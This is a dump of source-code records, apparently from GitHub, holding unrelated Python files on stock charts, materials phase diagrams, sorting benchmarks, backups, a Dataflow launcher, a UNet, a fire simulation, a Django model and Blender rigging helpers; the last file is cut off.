V.append(0)\n \n # Defining Market Capitalization Value for Symbol\n #MC = GetMaretMarketCap(symbol)\n \n #Reversing Lists\n H.reverse()\n L.reverse()\n O.reverse()\n C.reverse()\n D.reverse()\n V.reverse()\n\n #Converting Data to float-Str\n H = np.array(H).astype(float)\n L = np.array(L).astype(float)\n O = np.array(O).astype(float)\n C = np.array(C).astype(float)\n V = np.array(V).astype(float)\n D = np.array(D).astype(str)\n \n return {\"High\": H, \"Open\": O, \"Close\": C, \"Low\": L, \"Volume\": V, \"Date\": D}\n\ndef LinePlot(symbol, D, C, *args):\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=D, y=C,\n line=dict(width=3)))\n for x in args:\n fig.add_trace(go.Scatter(x=D, y=x[0], name= x[1],\n line=dict(width=1, dash='dot')))\n\n fig.update_layout(xaxis_title=\"Days\", yaxis_title=\"Stock Values\", title=f\"{symbol.upper()} Predictions\")\n\n #Save Plot\n name = os.urandom(13).hex()\n fig.write_image(f'static/data/{name}.png', width=500, height=500, scale=5)\n \n return name\n \n\ndef CandleStick(symbol, H, O, C, L, V, D, *args):\n fig = go.Figure(data=[go.Candlestick(x=D,\n open=O,\n high=H,\n low=L,\n close=C)])\n fig.update_layout(xaxis_rangeslider_visible=False)\n \n for x in args:\n fig.add_trace(go.Scatter(x=D, y=x, name='Moving Average',\n line=dict(width=2)))\n\n fig.update_layout(xaxis_title=\"Time\", yaxis_title=\"Stock Values\", title=f\"{symbol.upper()} Time Series\")\n\n #Save Plot\n name = os.urandom(12).hex()\n fig.write_image(f'static/data/{name}.png', width=500, height=500, scale=5)\n \n return name\n\n\n\n","repo_name":"yassernamez03/Finance-Chatbot","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43680384487","text":"'''\nCreated on 2020.06.03\n\n@author: dd\n'''\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram, PDPlotter\nfrom 
myResearch.getOrigStableEntriesList import getOrigStableEntriesList\nfrom pymatgen.core.periodic_table import Element\nfrom pymatgen.core.composition import Composition\nimport matplotlib.pyplot as plt\nfrom chemicalDiagram.ChemicalPotentialDiagram import ChemPotDiagram,ChemPotPlotter,trans_PD_to_ChemPot_entries\nels = [\"O\",\"Mn\"]\nelsE = [Element(i) for i in els]\nentries = getOrigStableEntriesList(els)\nentries = sorted(entries,key = lambda entry: entry.composition.get_atomic_fraction(els[1]))\nfor e in entries:\n print(e.name)\npd = PhaseDiagram(entries,elsE)\nD = {}\nfor e in entries:\n D[e] = pd.get_form_energy_per_atom(e)\nax = plt.gca()\nxx = []\nyy = []\nname = []\nfor e in entries:\n formE = D[e]\n ind = entries.index(e)\n if ind != len(entries)-1:\n formEnext = D[entries[ind+1]]\n slope = (formEnext-formE)/(entries[ind+1].composition.get_atomic_fraction(els[1])-e.composition.get_atomic_fraction(els[1]))\n intercept = D[e]-slope*e.composition.get_atomic_fraction(els[1])\n name.append(e.name)\n xx.append(intercept)\n yy.append(intercept+slope)\n ax.text(intercept, intercept+slope,e.name)\nax.plot(xx, yy)\n\nax.set_xlim([-10,0])\nax.set_ylim([-10,0])\nplt.xlabel(\"mu\"+els[0])\nplt.ylabel(\"mu\"+els[1])\nplt.show()\n# PDPlotter(pd).show()","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"interceptPD3.py","file_name":"interceptPD3.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6384769193","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\ndf = pd.read_excel(r'C:\\Users\\pandy\\Documents\\UGM\\Akademik\\Semester 3\\MII2201 Analisis Algoritma dan Kompleksitas\\6\\Tugas\\sort.xlsx')\nprint(df)\n\n\n# In[2]:\n\n\nimport matplotlib.pyplot as plt\n\nx = df['n']\nyS = df['avgS']\nyH = df['avgH']\nyR = df['avgR']\nfig, ax = plt.subplots()\nax.plot(x, yS, '-o', label = 'selection sort')\nax.plot(x, yH, '-o', label = 'heap sort')\nax.plot(x, yR, '-o', label = 'radix sort')\nplt.xlabel('number of data (n)')\nplt.ylabel('average running time (seconds)')\nplt.title('Sorting time complexity')\nplt.xticks(rotation = 45)\nplt.grid(linestyle = 'dotted')\nplt.legend()\nplt.savefig('sortCombined.png', dpi = 300, bbox_inches = 'tight')\n\nfor i, txt in enumerate(yS):\n ax.annotate(txt, (x[i], yS[i]))\n\nfor i, txt in enumerate(yH):\n ax.annotate(txt, (x[i], yH[i]))\n \nfor i, txt in enumerate(yR):\n ax.annotate(txt, (x[i], yR[i]))\n\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"pandya-ae/algorithm-complexity-analysis","sub_path":"Sort/sortCombined.py","file_name":"sortCombined.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20553682455","text":"#!/usr/bin/python3\n\n\"\"\"\n\nAuthor: Tyler Santos\nDate: 8/1/2023\n\n\"\"\"\n\nimport os\nimport subprocess\nimport tarfile\nfrom datetime import date\n\ncurrent_date = str(date.today())\nhostname = subprocess.getoutput(\"hostname -s\")\nbackup_destination = '/home/tyler/backups/'\n\n\nsource_folders = [\n '/home/tyler/test1/',\n '/home/tyler/test2/'\n]\n\noutput = [\n backup_destination + 'test1' + '-' + hostname + current_date + '.tar.gz',\n backup_destination + 'test2' + '-' + hostname + current_date + '.tar.gz'\n]\n\n###\n# Backup files\n###\nfor index, folder in enumerate(source_folders):\n tar_archive = tarfile.open(output[index], mode='w:gz')\n\n for root, dirs, files in 
os.walk(folder):\n for file in files:\n tar_archive.add(os.path.join(root, file))\n\n tar_archive.close()\n\n\n###\n# Delete the 2 oldest files\n###\nos.chdir(backup_destination)\nfiles = sorted(os.listdir(backup_destination), key=os.path.getctime)\n\nos.remove(files[0])\nos.remove(files[1])\n\nprint(\"Deleted \" + files[0] + \" and \" + files[1])\n","repo_name":"santost12/uf-abe-scripts","sub_path":"python/nfs-backups-v1.py","file_name":"nfs-backups-v1.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7905875344","text":"#Cloud Function to run Data Flow Pipeline on new file upload in Google Storage functions-df-gcs-bq-load-job\n\n#############main.py##################\ndef startDataflowProcess(data, context):\n\tfrom googleapiclient.discovery import build\n\t#replace with your projectID\n\tproject = \"third-campus-303308\"\n\tjob = project + \" \" + str(data['timeCreated'])\n\t#path of the dataflow template on google storage bucket\n\ttemplate = \"gs://third-campus-303308-df-bucket/sample-template/template_data_ingestion_df\"\n\tinputFile = \"gs://\" + str(data['bucket']) + \"/\" + str(data['name'])\n\tbq_table_name = \"ds_bigmart.big_mart_cf\"\n\t#user defined parameters to pass to the dataflow pipeline job\n\tparameters = {\n\t\t'inputFile': inputFile, 'bq_table': bq_table_name\n\t}\n\t#tempLocation is the path on GCS to store temp files generated during the dataflow job\n\tenvironment = {'tempLocation': 'gs://third-campus-303308-df-bucket/temp-location'}\n\n\tservice = build('dataflow', 'v1b3', cache_discovery=False)\n\t#below API is used when we want to pass the location of the dataflow job\n\trequest = service.projects().locations().templates().launch(\n\t\tprojectId=project,\n\t\tgcsPath=template,\n\t\tlocation='europe-west2',\n\t\tbody={\n\t\t\t'jobName': job,\n\t\t\t'parameters': parameters,\n\t\t\t'environment':environment\n\t\t},\n\t)\n\tresponse = request.execute()\n\tprint(str(response))\n\n","repo_name":"trushasahu/Fun-to-invoke-DF-to-load-CSV-to-BQ","sub_path":"function/Fun_to_invok_DF_to_load_CS_CSV_to_BQ_tbl.py","file_name":"Fun_to_invok_DF_to_load_CS_CSV_to_BQ_tbl.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43383723128","text":"from typing import Any\nimport torch\nfrom torch import nn\n\n\nclass ConvBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv = nn.Conv2d(\n channels_in,\n channels_out,\n 3,\n padding = 'same',\n padding_mode = 'reflect'\n )\n self.act = nn.LeakyReLU(0.1)\n self.skip = channels_in == channels_out\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n if self.skip:\n x_0 = x\n x = self.conv(x)\n x = self.act(x)\n if self.skip:\n x = x + x_0\n return x\n\n\nclass InBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv = ConvBlock(channels_in, channels_out)\n self.down = DownBlock(channels_out, channels_out)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv(x)\n x = self.down(x)\n return x\n\n\nclass OutBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_mid: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv1 = ConvBlock(channels_in, channels_mid)\n self.conv2 = ConvBlock(channels_mid, channels_mid // 2)\n self.conv_out = 
nn.Conv2d(\n channels_mid // 2,\n channels_out,\n 3,\n padding = 'same',\n padding_mode = 'reflect'\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv_out(x)\n return x\n\n\nclass DownBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int,\n ) -> None:\n super().__init__()\n self.conv = ConvBlock(channels_in, channels_out)\n self.pool = nn.Conv2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n padding_mode = 'reflect'\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv(x)\n x = self.pool(x)\n return x\n\n\nclass UpBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.conv1 = ConvBlock(channels_in, channels_out)\n self.conv2 = ConvBlock(channels_out, channels_out)\n self.up = nn.ConvTranspose2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n output_padding = 1\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.up(x)\n return x\n\n\nclass MidBlock(nn.Module):\n def __init__(self,\n channels_in: int,\n channels_out: int\n ) -> None:\n super().__init__()\n self.down = DownBlock(channels_in, channels_out)\n self.conv = ConvBlock(channels_out, channels_out)\n self.up = nn.ConvTranspose2d(\n channels_out,\n channels_out,\n 3,\n stride = 2,\n padding = 1,\n output_padding = 1\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.down(x)\n x = self.conv(x)\n x = self.up(x)\n return x\n\n\nclass UNetV2(nn.Module):\n def __init__(self,\n channels_in: int = 3,\n channels_out: int = 3,\n blocks: int = 6,\n stepping: tuple[int, int] = (48, 96, 64)\n ) -> None:\n super().__init__()\n self.ksize: int = 2 ** blocks\n self.down_blocks: nn.ModuleList[DownBlock] = nn.ModuleList((\n InBlock(channels_in, stepping[0]),\n *( DownBlock(stepping[0], stepping[0]) for _ in range(blocks - 2) )\n ))\n self.mid_block = MidBlock(stepping[0], stepping[0])\n self.up_blocks: nn.ModuleList[UpBlock] = nn.ModuleList((\n *(\n UpBlock(stepping[0] + stepping[1] if i > 0 else stepping[1], stepping[1])\n for i in range(blocks - 1)\n ),\n OutBlock(stepping[1] + channels_in, stepping[2], channels_out)\n ))\n self.hparams: dict[str, Any] = {\n 'blocks': blocks,\n 'fixed_step': True,\n 'stepping': stepping,\n 'net': self.__class__.__name__\n }\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n pools: list[torch.Tensor] = [ x ]\n for l in self.down_blocks:\n x = l(x)\n pools.append(x)\n x = self.mid_block(x)\n for l in self.up_blocks:\n x = torch.cat([ x, pools.pop() ], dim = 1)\n x = l(x)\n return x\n\n","repo_name":"lopho/im2im","sub_path":"unet_v2.py","file_name":"unet_v2.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11489568830","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n coins = m // 10\n remain = m % 10\n coins += remain // 5\n coins += remain % 5\n return coins\n\nif __name__ == '__main__':\n m = int(input())\n print(get_change(m))\n","repo_name":"supracharger/Data-Structures-Algorithms","sub_path":"Algorithmic_Toolbox/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16791529072","text":"# extended fire model from pcraster workshop, based on work by 
http://karssenberg.geo.uu.nl/labs/index.html\nfrom pcraster import *\nfrom pcraster.framework import *\n\nclass Fire(DynamicModel):\n def __init__(self):\n DynamicModel.__init__(self)\n setclone('clone.map')\n\n def initial(self):\n start = readmap(\"start\")\n start = nominal(start)\n\n inputMap = uniform(1)\n\n # start the fire at random location (doesn't matter if empty or not)\n # fireStarter = ifthenelse(inputMap == mapmaximum(inputMap), boolean(1), boolean(0))\n \n # 0 empty, 1 fire, 5, 6 ... tree species\n # distribution of empty and tree cells\n # self.all = ifthenelse(inputMap < 0, nominal(0), nominal(5)) # empty or species 5\n # self.all = ifthenelse(inputMap > 0.5, nominal(6), self.all) # species 6 or as defined above\n # self.all = ifthenelse(fireStarter, nominal(1), self.all) # set fire\n\n # use original starter map instead for continuous fire starting point\n self.all = ifthenelse(pcrnot(boolean(start)), nominal(5), start)\n self.all = ifthenelse(pcrand(self.all == 5, inputMap < 0.5), nominal(6), self.all)\n \n self.report(self.all, \"input\")\n\n # fire = self.all == 1\n # self.report(fire, \"fire\")\n\n\n\n def dynamic(self):\n # currently burning\n fire = self.all == 1\n self.report(fire, \"fire\")\n # burn\n self.all = ifthenelse(self.all == 1, nominal(0), self.all)\n\n # distance to fire\n if (maptotal(scalar(fire)) > 0):\n print(\"fire\")\n distanceToFire = spread(fire, 0, 1)\n self.report(distanceToFire, \"dist\")\n\n randomMap = uniform(1)\n\n # new fire, based on distance\n n1 = ifthenelse(pcrand(randomMap < 0.9, distanceToFire < 11), boolean(1), boolean(0))\n n2 = ifthenelse(pcrand(randomMap < 0.4, distanceToFire < 25), boolean(1), boolean(0))\n n3 = ifthenelse(pcrand(randomMap < 0.1, distanceToFire < 55), boolean(1), boolean(0))\n\n newFireDist = pcror(n1, pcror(n2, n3))\n # newFireDist = n1\n self.report(newFireDist, \"nFD\")\n\n # or, model depending on quadratic spread\n # distanceToFire = spread(fire, 0, 1.1) * spread(fire, 0, 1.1)\n # distanceToFire = 1 / distanceToFire\n # newFireDist = ifthenelse(randomMap < distanceToFire, boolean(1), boolean(0))\n # self.report(newFireDist, \"dist\")\n\n # new fire, based on trees\n species5 = self.all == 5\n species6 = self.all == 6\n\n # draw again\n randomMap = uniform(1)\n\n s1 = ifthenelse(pcrand(randomMap < 0.8, species5), boolean(1), boolean(0))\n s2 = ifthenelse(pcrand(randomMap < 0.7, species6), boolean(1), boolean(0))\n\n newFireSpecies = pcror(s1, s2)\n self.report(newFireSpecies, \"nFS\")\n\n # bring together both distributions\n newFire = pcrand(newFireDist, newFireSpecies)\n self.report(newFire, \"nF\")\n\n # empty cells can not burn\n newFireNotEmpty = pcrand(scalar(self.all) > 0, newFire)\n self.report(newFireNotEmpty, \"nFnE\")\n\n # change in self.all: if newFire, set as 1, others stay the same\n self.all = ifthenelse(newFireNotEmpty, nominal(1), self.all)\n else:\n # self.all should remain constant\n print(\"no fire\")\n self.report(self.all, \"all\")\n area = areaarea(self.all)\n self.report(area, \"area\")\n\nnrOfTimeSteps=30\nmyModel = Fire()\ndynamicModel = DynamicFramework(myModel,nrOfTimeSteps)\ndynamicModel.run()\n\n","repo_name":"jonathom/extendedFireModel","sub_path":"fire_ext.py","file_name":"fire_ext.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72295239413","text":"import random\n\n\nfrom core.models import PersonaModel\n\nfrom django.db import models\n\n\nclass 
Teacher(PersonaModel):\n FIELD_OF_STUDY_CHOICES = [\n ('Programming', (\n ('front-end', 'Front-End'),\n ('java', 'Java'),\n ('php', 'PHP'),\n ('python', 'Python'),\n ('devops', 'Devops'),\n ('machine-learning', 'Machine Learning'),\n ('c-sharp', 'C#'),\n )),\n ('Quality Assurance', (\n ('qa-manual', 'QA Manual'),\n ('qa-automation-java', 'QA Automation Java'),\n ('qa-automation-java', 'QA Automation Python'),\n )),\n ('Management', (\n ('project-management', 'Project Management'),\n ('product-management', 'Product Management'),\n ('hr', 'Recruitment & HR'),\n ('business-analyst', 'Business Analyst'),\n )),\n ('Marketing', (\n ('internet-marketing', 'Internet Marketing'),\n ('smm', 'Social Media Marketing'),\n ('smm-pro', 'SMM Pro'),\n ('inter-mark-for-business', 'Internet Marketing for Business'),\n )),\n ('Design', (\n ('ux-ui', 'UX/UI Design'),\n )),\n ('Children Education', (\n ('front-end-kids', 'Front-end(Kids)'),\n ('python-kids', 'Python(Kids)'),\n ('design-kids', 'Design(Kids)'),\n ('java-kids', 'Java(Kids)'),\n )),\n ]\n salary = models.PositiveIntegerField(default=10_000)\n specialization = models.CharField(\n db_column='specialization',\n max_length=25,\n choices=FIELD_OF_STUDY_CHOICES,\n )\n\n def __str__(self):\n return f'{self.first_name} {self.last_name} ({self.specialization.title()}) (${self.salary})'\n\n class Meta:\n db_table = 'lms_teachers'\n\n @classmethod\n def _generate(cls):\n obj = super()._generate()\n spec = random.choice(\n [specialization for _, specializations in cls.FIELD_OF_STUDY_CHOICES\n for specialization in specializations]\n )\n obj.specialization = spec[0]\n obj.salary = random.randint(10_000, 100_000)\n obj.save()\n","repo_name":"HansLanda96/DjangoOpenning","sub_path":"teachers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3036093020","text":"import bpy\nimport os\nimport pathlib\nimport numpy\n\nimport mathutils\nimport platform\nimport subprocess\n\nimport math\n\nscript_file = os.path.realpath(__file__)\naddon_directory = os.path.dirname(script_file)\naddon_name = os.path.basename(addon_directory)\n\nSEPARATOR_List = [\".\", \"_\", \"-\"]\nSide_List = {\"l\": \"r\", \"L\":\"R\", \"left\": \"right\", \"Left\":\"Right\", \"LEFT\": \"RIGHT\"}\n\nFRONT_Side_Separator_List = {}\nBACK_Side_Separator_List = {}\n\nfor key, value in Side_List.items():\n\n for separator in SEPARATOR_List:\n FRONT_Side_Separator_List[key+separator] = value+separator\n BACK_Side_Separator_List[separator+key] = separator+value\n\n\n\n\n\ndef Parent_Counter(self, Bone):\n\n Checker = Bone.parent\n if Checker:\n self.Counter += 1\n Parent_Counter(self, Checker)\n\n\n\ndef Find_Chain_Root(Chain_Length, Bone):\n\n bone_chain = []\n\n bone_chain.append(Bone)\n\n parent_finder = Bone.parent\n\n if parent_finder:\n bone_chain.append(parent_finder)\n Loop_Amount = Chain_Length-2\n\n if Loop_Amount > 0:\n for count in range(Loop_Amount):\n if parent_finder:\n parent_finder = parent_finder.parent\n if parent_finder:\n bone_chain.append(parent_finder)\n else:\n bone_chain.append(None)\n\n return bone_chain\n\n\n\ndef Align_Bone_Roll(object, bone, target):\n\n\n bone = object.data.edit_bones.get(bone.name)\n\n bpy.ops.armature.select_all(action='DESELECT')\n\n cursor_location = bpy.context.scene.cursor.location.copy()\n\n bpy.context.scene.cursor.location = object.matrix_world @ target\n\n bone.select = True\n 
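# Only this bone is selected, so the CURSOR roll recalculation below aims its roll at the 3D cursor placed on the target; the 90-degree subtraction that follows adjusts the axis convention.\n    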
bpy.ops.armature.calculate_roll(type='CURSOR')\n bone.roll -= math.radians(90)\n\n bpy.context.scene.cursor.location = cursor_location\n\n bpy.ops.armature.select_all(action='DESELECT')\n\n\ndef Align_Bones_Roll(object, bones, target):\n\n bone_selection = [select_bone for select_bone in object.data.edit_bones if select_bone.select]\n\n for bone in bones:\n Align_Bone_Roll(object, bone, target)\n bpy.ops.armature.select_all(action='DESELECT')\n\n for select_bone in bone_selection:\n select_bone.select = True\n\ndef Get_Pole_Angle(object, bone, target):\n\n original_roll = bone.roll\n\n Align_Bone_Roll(object, bone, target)\n bpy.ops.armature.select_all(action='DESELECT')\n\n adjusted_roll = bone.roll\n\n bone.roll = original_roll\n\n pole_angle = original_roll - adjusted_roll\n\n if pole_angle > math.radians(180):\n pole_angle = pole_angle - math.radians(360)\n\n return pole_angle\n\n\n\ndef open_file(path):\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])\n\nclass Side_Flipper:\n\n def __init__(self, left, right):\n self.left = left\n self.right = right\n\n def flip_name(self, name):\n\n flipped_name = None\n\n if self.left in name:\n flipped_name = name.replace(self.left, self.right)\n elif self.right in name:\n flipped_name = name.replace(self.right, self.left)\n\n return flipped_name\n\n def get_flipped_bone(self, bones, bone):\n\n flipped_bone = None\n if bones:\n if bone:\n flipped_bone_name = self.flip_name(bone.name)\n if flipped_bone_name:\n flipped_bone = bones.get(flipped_bone_name)\n\n return flipped_bone\n\n\n\ndef curve_to_mesh(object, resolution=None):\n\n offset = object.data.offset\n extrude = object.data.extrude\n taper_object = object.data.taper_object\n taper_radius_mode = object.data.taper_radius_mode\n bevel_mode = object.data.bevel_mode\n bevel_depth = object.data.bevel_depth\n use_fill_caps = object.data.use_fill_caps\n resolution_u = object.data.resolution_u\n\n object.data.offset = 0\n object.data.extrude = 0\n object.data.taper_object = None\n object.data.taper_radius_mode = \"OVERRIDE\"\n object.data.bevel_mode = \"ROUND\"\n object.data.bevel_depth = 0\n object.data.use_fill_caps = False\n\n if resolution:\n object.data.resolution_u = resolution\n\n deg = bpy.context.evaluated_depsgraph_get()\n me = bpy.data.meshes.new_from_object(object.evaluated_get(deg), depsgraph=deg)\n\n object.data.offset = offset\n object.data.extrude = extrude\n object.data.taper_object = taper_object\n object.data.taper_radius_mode = taper_radius_mode\n object.data.bevel_mode = bevel_mode\n object.data.bevel_depth = bevel_depth\n object.data.use_fill_caps = use_fill_caps\n object.data.resolution_u = resolution_u\n\n\n\n\n\n new_obj = bpy.data.objects.new(object.name + \"_mesh\", me)\n bpy.context.collection.objects.link(new_obj)\n\n new_obj.matrix_world = object.matrix_world\n\n return new_obj\n\ndef get_addon_preferences():\n addon_preferences = bpy.context.preferences.addons[addon_name].preferences\n return addon_preferences\n\ndef get_addon_name():\n return addon_name\n\ndef get_addon_directory():\n return addon_directory\n\ndef update_UI():\n for screen in bpy.data.screens:\n for area in screen.areas:\n area.tag_redraw()\n\ndef draw_subpanel(self, boolean, property, label, layout):\n\n if boolean:\n ICON = \"TRIA_DOWN\"\n else:\n ICON = \"TRIA_RIGHT\"\n\n row = layout.row(align=True)\n row.alignment = \"LEFT\"\n row.prop(self, property, text=label, 
emboss=False, icon=ICON)\n\n    return boolean\n\n\ndef draw_subpanel_bool(source, boolean, property, bool_source, bool_prop, label, layout):\n\n    if boolean:\n        ICON = \"TRIA_DOWN\"\n    else:\n        ICON = \"TRIA_RIGHT\"\n\n    row = layout.row(align=True)\n    row.alignment = \"LEFT\"\n\n    row.prop(source, property, text=\"\", emboss=False, icon=ICON)\n    row.prop(bool_source, bool_prop, text=\"\")\n    row.prop(source, property, text=label, emboss=False, icon=ICON)\n\n    return boolean\n\n\n\ndef get_bounding_box(object):\n\n    bbox_corners = [object.matrix_world @ mathutils.Vector(corner) for corner in object.bound_box]\n\n    return bbox_corners\n\n\ndef midpoint(coordinates, mode):\n\n    if len(coordinates) > 0:\n\n        if mode == \"BOUNDING_BOX\":\n\n            x= []\n            y= []\n            z= []\n\n            for coordinate in coordinates:\n                x.append(coordinate[0])\n                y.append(coordinate[1])\n                z.append(coordinate[2])\n\n            range_x = (max(x), min(x))\n            range_y = (max(y), min(y))\n            range_z = (max(z), min(z))\n\n            bounding_box_coordinate = []\n\n            for a in range_x:\n                for b in range_y:\n                    for c in range_z:\n                        bounding_box_coordinate.append((a, b, c))\n\n            return mathutils.Vector(numpy.array(bounding_box_coordinate).mean(axis=0))\n\n        if mode == \"CENTER\":\n            return mathutils.Vector(numpy.array(coordinates).mean(axis=0))\n    else:\n        return None\n\n\n\n\n\ndef object_switch_mode(object, mode):\n\n    bpy.context.view_layer.update()\n\n    Previous_Mode = object.mode\n\n    if not object.visible_get():\n\n        if not bpy.context.collection.objects.get(object.name):\n\n            bpy.context.collection.objects.link(object)\n\n\n\n        object.hide_viewport = False\n        object.hide_set(False)\n\n        object.hide_select = False\n\n    if object.visible_get():\n\n        object.select_set(True)\n        bpy.context.view_layer.objects.active = object\n        bpy.ops.object.mode_set(mode=mode, toggle=False)\n\n    return Previous_Mode\n\n\n\ndef create_bone(armature, name, head, tail, deform, Flip_Bone = False):\n\n    bone = armature.data.edit_bones.new(name)\n\n    if Flip_Bone:\n        bone.head = tail\n        bone.tail = head\n    else:\n        bone.head = head\n        bone.tail = tail\n\n    bone.use_deform = deform\n\n    return bone\n\ndef get_object_center(object, mode):\n\n    if mode == \"ORIGIN\":\n        # return object.matrix_world.inverted() @ object.location\n        return object.matrix_world.inverted() @ object.matrix_world.to_translation()\n\n    if mode in [\"CENTER\", \"BOUNDING_BOX\"]:\n\n        if not object.type in [\"MESH\",\"CURVE\" , \"ARMATURE\"]:\n            # return object.matrix_world.inverted() @ object.location\n            return object.matrix_world.inverted() @ object.matrix_world.to_translation()\n\n        if object.type == \"MESH\":\n            # create_lists = [object.matrix_world @ vert.co for vert in object.data.vertices]\n            create_lists = [vert.co for vert in object.data.vertices]\n\n        if object.type == \"CURVE\":\n\n            create_lists = []\n\n            for spline in object.data.splines:\n\n                for point in spline.points:\n                    # create_lists.append(object.matrix_world @ point.co)\n                    create_lists.append(point.co.xyz)\n\n                for bezier_point in spline.bezier_points:\n                    # create_lists.append(object.matrix_world @ bezier_point.co)\n                    create_lists.append(bezier_point.co.xyz)\n\n        if object.type == \"ARMATURE\":\n\n            create_lists = []\n\n            for bone in object.data.bones:\n                # create_lists.append(object.matrix_world @ bone.head)\n                # create_lists.append(object.matrix_world @ bone.tail)\n\n                create_lists.append(bone.head)\n                create_lists.append(bone.tail)\n\n        if mode == \"CENTER\":\n            return midpoint(create_lists, \"CENTER\")\n\n        if mode == \"BOUNDING_BOX\":\n            return midpoint(create_lists, \"BOUNDING_BOX\")\n\n\ndef 
Normal_To_Offset(object, location, normal, offset):\n\n mw = object.matrix_world.copy()\n\n o = location\n axis_src = normal\n axis_dst = mathutils.Vector((0, 0, 1))\n\n matrix_rotate = mw.to_3x3()\n matrix_rotate = matrix_rotate @ axis_src.rotation_difference(axis_dst).to_matrix().inverted()\n matrix_translation = mathutils.Matrix.Translation(mw @ o)\n\n Normal_Matrix = matrix_translation @ matrix_rotate.to_4x4() @ mathutils.Vector(offset)\n Normal_Offset = object.matrix_world.inverted() @ Normal_Matrix\n\n return Normal_Offset\n\ndef Average_Normals(Normals):\n average_normals = mathutils.Vector(numpy.sum(Normals, axis=0) / len(Normals))\n return average_normals\n\ndef Add_Weight(object, bone_name, indices):\n\n Vertex_Group = object.vertex_groups.get(bone_name) \n\n if Vertex_Group == None:\n Vertex_Group = object.vertex_groups.new( name = bone_name )\n \n\n\n Vertex_Group.add(indices, 1.0, 'REPLACE' )\n\n return Vertex_Group\n\ndef Add_Armature_Modifier(object, Armature, name=\"Armature\"):\n\n for modifier in object.modifiers:\n if modifier.type == \"ARMATURE\":\n if modifier.object == Armature:\n return modifier\n\n modifier = object.modifiers.new(type=\"ARMATURE\", name=name)\n modifier.object = Armature\n\n return modifier\n\ndef Hook_Vertex_Bone(object, armature, vertex_indices, bone_name, name=\"Hook\"):\n\n modifier = object.modifiers.new(type=\"HOOK\", name=name)\n modifier.object = armature\n modifier.subtarget = bone_name\n modifier.vertex_indices_set(vertex_indices)\n\n return modifier\n\ndef get_object_indices(object):\n\n if object.type == \"MESH\":\n indices = [vertex.index for vertex in object.data.vertices]\n return indices\n\n else:\n return None\n\ndef check_bone_select(bone, mode):\n\n if mode == \"EDIT_ARMATURE\":\n return bone.select\n\n if mode == \"POSE\":\n return bone.bone.select\n\n\ndef Create_Armature(name):\n\n armature = bpy.data.armatures.new(name)\n object = bpy.data.objects.new(name, armature)\n bpy.context.collection.objects.link(object)\n\n return object\n\ndef Create_Empty(name):\n\n object = bpy.data.objects.new(name, None)\n bpy.context.collection.objects.link(object)\n\n return object\n\ndef Hook_Vertex_Empty(object, empty, vertex_indices, name=\"Hook\"):\n\n modifier = object.modifiers.new(type=\"HOOK\", name=name)\n modifier.object = empty\n modifier.vertex_indices_set(vertex_indices)\n\n return modifier\n\ndef Normal_To_Orientation(object, location, normal):\n\n mw = object.matrix_world.copy()\n\n o = location\n axis_src = normal\n axis_dst = mathutils.Vector((0, 0, 1))\n\n matrix_rotate = mw.to_3x3()\n matrix_rotate = matrix_rotate @ axis_src.rotation_difference(axis_dst).to_matrix().inverted()\n matrix_translation = mathutils.Matrix.Translation(mw @ o)\n\n Normal_Matrix = matrix_translation @ matrix_rotate.to_4x4()\n\n return Normal_Matrix\n\ndef append_bone_shape(path):\n\n objects = []\n\n if path != \"None\":\n path = path\n section = \"/Object/\"\n directory = path + section\n filename = \"Widget\"\n\n bpy.ops.wm.append(filename=filename, directory=directory)\n\n objects = [object for object in bpy.context.selected_objects]\n\n return objects\n\n\ndef 